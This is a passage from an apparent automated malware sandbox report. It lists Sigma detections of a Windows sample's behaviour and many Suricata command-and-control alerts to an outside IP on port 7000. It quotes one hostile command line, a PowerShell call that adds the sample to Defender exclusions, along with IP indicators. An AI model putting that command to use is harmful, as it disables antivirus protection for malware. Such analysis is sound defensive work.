C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 6408, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP", ProcessId: 7752, ProcessName: cvtres.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\rqbprm.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\rqbprm.exe, ParentProcessId: 1748, ParentProcessName: rqbprm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe" , ProcessId: 2092, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\agentwebreviewDhcp\portBrowserweb.exe, ProcessId: 7392, TargetFilename: C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HaLCYOFjMN.exe", ParentImage: C:\Users\user\Desktop\HaLCYOFjMN.exe, ParentProcessId: 720, ParentProcessName: HaLCYOFjMN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', ProcessId: 6768, ProcessName: powershell.exe
                                    Sigma detected: Windows Processes Suspicious Parent Directory
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7412, ProcessName: svchost.exe

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\agentwebreviewDhcp/portBrowserweb.exe", ParentImage: C:\agentwebreviewDhcp\portBrowserweb.exe, ParentProcessId: 7392, ParentProcessName: portBrowserweb.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", ProcessId: 6408, ProcessName: csc.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-07T18:04:27.312774+010020480951A Network Trojan was detected192.168.2.749983104.21.48.180TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-07T18:03:14.080824+010028536851A Network Trojan was detected192.168.2.749975149.154.167.220443TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-07T18:03:29.197267+010028528701Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    2025-01-07T18:03:39.472382+010028528701Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    2025-01-07T18:03:49.797368+010028528701Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    2025-01-07T18:03:53.951272+010028528701Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    2025-01-07T18:04:00.128847+010028528701Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    2025-01-07T18:04:10.590947+010028528701Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    2025-01-07T18:04:20.897358+010028528701Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    2025-01-07T18:04:23.952124+010028528701Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    2025-01-07T18:04:34.259682+010028528701Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-07T18:03:29.198973+010028529231Malware Command and Control Activity Detected192.168.2.74997694.141.122.1617000TCP
                                    2025-01-07T18:03:39.475195+010028529231Malware Command and Control Activity Detected192.168.2.74997694.141.122.1617000TCP
                                    2025-01-07T18:03:49.809201+010028529231Malware Command and Control Activity Detected192.168.2.74997694.141.122.1617000TCP
                                    2025-01-07T18:04:00.247862+010028529231Malware Command and Control Activity Detected192.168.2.74997694.141.122.1617000TCP
                                    2025-01-07T18:04:10.923064+010028529231Malware Command and Control Activity Detected192.168.2.74997694.141.122.1617000TCP
                                    2025-01-07T18:04:12.465955+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:12.587831+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:12.706921+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:12.819339+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:12.926773+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.037013+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.174928+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.324048+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.460752+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.610868+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.740083+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.870139+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.036384+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.175784+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.329460+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.448891+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.589062+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.772321+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.014670+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.210930+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.372806+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.506425+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.699869+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.871119+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.025845+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.165432+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.303826+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.451509+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.627559+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.745605+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.863511+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.980517+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.118048+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.220216+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.336988+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.453708+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.563782+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.672514+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.791670+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.928371+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.032637+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.141140+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.250525+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.365299+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.469268+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.582591+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.687952+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.797451+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.906757+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.016127+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.126093+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.234940+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.344671+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.453784+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.562958+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.698955+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.815770+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.926937+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.031731+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.141127+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.250411+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.359776+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.469224+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.592686+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.703557+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.812963+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:20.930041+010028529231Malware Command and Control Activity Detected192.168.2.74997694.141.122.1617000TCP
                                    2025-01-07T18:04:20.930463+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.031710+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.141044+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.260217+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.375936+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.487292+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.594783+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.704004+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.813164+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:21.938035+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.050278+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.156932+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.282853+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.391202+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.500528+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.611632+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.719160+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.828475+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:22.938113+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.047456+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.156855+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.266456+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.375485+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.492711+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.610512+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.722000+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.828875+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:23.941020+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.054932+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.166116+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.281666+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.414600+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.516442+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.625445+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.734901+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.845230+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:24.981872+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.103499+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.221709+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.352947+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.473002+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.579339+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.689728+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.808761+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:25.923159+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.071332+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.174677+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.296737+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.423123+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.533252+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.641115+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.750549+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.859856+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:26.969302+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.078587+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.205136+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.313088+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.422371+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.541471+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.672058+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.781851+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:27.908406+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.016254+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.125589+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.234936+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.347594+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.453816+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.566313+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.672376+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.781794+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:28.891660+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.028546+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.142287+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.250788+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.359990+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.469373+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:29.578758+010028529231Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:34.260473+010028529231Malware Command and Control Activity Detected192.168.2.74997694.141.122.1617000TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-07T18:03:53.951272+010028528741Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    2025-01-07T18:04:23.952124+010028528741Malware Command and Control Activity Detected94.141.122.1617000192.168.2.749976TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-07T18:04:12.465955+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:12.587831+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:12.706921+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:12.819339+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:12.926773+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.037013+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.174928+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.324048+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.460752+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.610868+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.740083+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:13.870139+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.036384+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.175784+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.329460+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.448891+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.589062+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:14.772321+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.014670+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.210930+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.372806+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.506425+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.699869+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:15.871119+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.025845+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.165432+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.303826+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.451509+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.627559+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.745605+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.863511+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:16.980517+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.118048+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.220216+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.336988+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.453708+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.563782+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.672514+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.791670+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:17.928371+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.032637+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.141140+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.250525+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.365299+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.469268+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.582591+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.687952+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.797451+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:18.906757+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
                                    2025-01-07T18:04:19.016127+010028528731Malware Command and Control Activity Detected192.168.2.74998294.141.122.1617000TCP
